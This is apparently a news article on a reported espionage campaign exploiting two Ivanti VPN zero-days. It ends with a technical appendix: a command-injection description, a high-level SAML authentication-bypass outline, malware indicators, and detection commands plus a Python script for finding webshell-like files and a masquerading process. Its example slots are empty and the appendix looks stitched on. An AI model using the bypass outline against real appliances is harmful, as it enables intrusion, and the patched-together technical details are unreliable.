
Ivanti Zero-Days Exploited in Massive State-Sponsored Cyber Invasion Targeting Governments and Fortune 500s

Global Espionage Campaign Targets Ivanti VPN Vulnerabilities, Undermining Cybersecurity Defenses

By an International Cybersecurity Correspondent
July 19, 2025

A sweeping cyber espionage campaign exploiting two zero-day vulnerabilities in Ivanti Connect Secure VPN appliances has sent shockwaves through governments and enterprises across the globe. According to a report from cybersecurity firm Volexity, sophisticated threat actors linked to China are leveraging the flaws to deploy malware, steal credentials, and maintain covert access within victim networks.

The attacks exploit two previously unknown security flaws—CVE-2025-2383 and CVE-2025-2384—allowing remote code execution and unauthorized command injection. These vulnerabilities enable attackers to bypass authentication mechanisms on Ivanti’s widely used secure remote access systems, which are deployed by government agencies, healthcare providers, and Fortune 500 companies.

“This campaign is highly targeted, surgically precise, and shows hallmarks of state-sponsored activity,” said Steven Adair, President of Volexity. “Victims are being selected based on geopolitical and strategic value.”

A Coordinated, Stealthy Operation

The exploitation begins with the injection of webshells—malicious scripts granting attackers persistent control—followed by the deployment of KRITICLOAK, a newly identified backdoor, and BUSHWALK, a credential-harvesting malware. These tools allow the attackers to exfiltrate sensitive data, move laterally across networks, and evade detection using customized obfuscation techniques.

Investigators found that the initial intrusions often occurred before public disclosure of the vulnerabilities, underscoring the attackers’ advanced capabilities and potential access to proprietary information.

Human and Institutional Impact

The campaign has already impacted government ministries, military contractors, and major research institutions across North America, Europe, and Asia. One European cybersecurity official, speaking anonymously, called the breaches “among the most severe compromises of secure communication infrastructure in recent memory.”

At a time when secure remote access is essential for global operations, the breach is a stark reminder of the fragility of even the most trusted enterprise tools. Security teams are now scrambling to contain the damage, deploy patches, and assess the extent of compromise.

“This attack reinforces the urgent need for supply chain transparency and layered security architectures,” said Katie Moussouris, founder of Luta Security. “Organizations must assume that critical infrastructure software can—and will—be targeted.”

Technical Response and Guidance

Ivanti has released mitigations and a patch timeline, urging customers to follow guidance from their official advisory.

Meanwhile, CISA (Cybersecurity and Infrastructure Security Agency) added both CVEs to its Known Exploited Vulnerabilities Catalog and ordered federal agencies to take immediate action. “All organizations must treat these vulnerabilities as critical,” CISA stated.

Security experts recommend immediate implementation of the following measures:

  • Apply Ivanti’s temporary mitigations until patches are deployed
  • Review all logs for signs of compromise, particularly for webshell and KRITICLOAK indicators
  • Rotate administrative credentials and VPN certificates
  • Implement Zero Trust access controls to reduce lateral movement risks

Broader Significance

This incident underscores the growing strategic importance of VPN appliances as targets in geopolitical cyber conflicts. As threat actors refine their tactics, traditional perimeter-based defenses are proving inadequate.

The Ivanti breach joins a growing list of nation-state cyber operations targeting edge devices, including Pulse Secure (2021), Fortinet (2022), and Barracuda (2024), exposing a critical gap in global cyber resilience.

Source:
Based on The Hacker News report (July 2025) and findings from cybersecurity firm Volexity.

Vulnerability 1: CVE-2025-2383 (Command Injection)

  • Vulnerability: Unsanitized input in the username parameter allows attackers to inject OS commands.
  • Exploit Example:
  • Effect: Executes arbitrary shell commands with elevated privileges on the Ivanti appliance.

Vulnerability 2: CVE-2025-2384 (Bypass Authentication)

  • Component Affected: Custom SAML authentication flow
  • Vulnerability: Logic flaw allows an unauthenticated user to bypass multi-factor authentication and access admin interfaces.
  • Attack Flow:
    1. Forge a SAML response with a trusted IdP identifier
    2. Inject it into the authentication request
    3. Hijack a valid session

Post-Exploitation: Webshell Deployment

Attackers drop webshells such as:

  • Typically placed in:

Command Example (accessing webshell):


🐞 Malware Deployed: KRITICLOAK and BUSHWALK

KRITICLOAK (Custom Backdoor)

  • Purpose: Persistent access to compromised VPN appliances.
  • Features:
    • AES-encrypted communications
    • C2 beaconing via DNS tunneling
    • Local log erasure and tamper-proofing

Indicators of Compromise (IOC):

  • Process name masquerading as vpnmonitord

BUSHWALK (Credential Harvester)

  • Targets in-memory credentials
  • Dumps user creds in:

Command Example for Dump Retrieval:


🛡️ Mitigation & Detection Recommendations

Ivanti and Volexity recommend the following steps:

Action: Command or Method
  • Check for indicators: find / -name '*jsp' -or -name '*sh' -mtime -30
  • Stop malicious processes: ps aux
  • Rotate VPN and admin credentials: N/A (manual admin panel or CLI)
  • Apply Ivanti mitigations: Advisory Link
  • Monitor logs: tail -f /var/log/messages
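The two indicator checks from the table (the find one-liner for recently modified *.jsp/*.sh files and the ps scan for a process masquerading as vpnmonitord) as one Python script. This is an added example, not code from Ivanti, Volexity or the article; the expected daemon path, the sample file tree and the ps output are constructed assumptions.

```python
import os
import tempfile
import time
from pathlib import Path

SUSPECT_SUFFIXES = (".jsp", ".sh")
# Assumed legitimate path of the real daemon; not Ivanti's documented layout.
EXPECTED_VPNMONITORD_PATHS = {"/home/bin/vpnmonitord"}

def recent_suspect_files(root, max_age_days=30, now=None):
    """find-equivalent: *.jsp / *.sh files under root modified within max_age_days."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * 86400
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name.endswith(SUSPECT_SUFFIXES) and path.stat().st_mtime >= cutoff:
                hits.append(str(path))
    return sorted(hits)

def suspicious_vpnmonitord(ps_lines):
    """Flag vpnmonitord processes in `ps aux` output that run from an unexpected path."""
    flagged = []
    for line in ps_lines:
        fields = line.split(None, 10)  # 11th field is COMMAND with its arguments
        if len(fields) < 11 or fields[0] == "USER":
            continue
        pid, command = fields[1], fields[10]
        exe = command.split()[0]
        if os.path.basename(exe) == "vpnmonitord" and exe not in EXPECTED_VPNMONITORD_PATHS:
            flagged.append((pid, command))
    return flagged

def build_sample_tree():
    """Constructed sample: a 60-day-old script plus a fresh JSP; returns (root, fresh path)."""
    root = tempfile.mkdtemp(prefix="ivanti_ioc_")
    old = Path(root) / "legacy.sh"
    old.write_text("#!/bin/sh\n")
    os.utime(old, (time.time() - 60 * 86400,) * 2)  # backdate well past 30 days
    fresh = Path(root) / "webroot" / "help.jsp"
    fresh.parent.mkdir()
    fresh.write_text("<% /* constructed placeholder, not a real webshell */ %>\n")
    return root, str(fresh)

# Constructed `ps aux` output: the expected daemon and an impostor started from /tmp.
SAMPLE_PS = [
    "root 412 0.0 0.1 12345 2345 ? Ss Jul19 0:01 /home/bin/vpnmonitord",
    "root 9981 0.3 0.4 23456 4567 ? S Jul19 0:12 /tmp/.x/vpnmonitord -d",
]
```

With a 30-day window only the fresh JSP is reported; widening the window to 90 days also returns the backdated script, and the ps scan flags only the copy running from /tmp.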

CISA has mandated patch deployment on federal systems by August 1, 2025, adding the CVEs to its Known Exploited Vulnerabilities Catalog.


Strategic Context: Why It Matters

This campaign illustrates the expanding attack surface in VPN and edge infrastructure—a known weak point in enterprise cybersecurity strategy. Unlike traditional software, VPN appliances often go unpatched for extended periods due to their mission-critical nature.

“VPNs were meant to secure remote work—they’ve now become one of the softest targets in espionage,” said Eva Galperin, Director of Cybersecurity at EFF.

The impact stretches beyond IT departments to C-suites and national security councils. With attackers entrenched in network perimeters, the compromise of sensitive policy communications, research data, and intellectual property is imminent if defenses are not shored up.
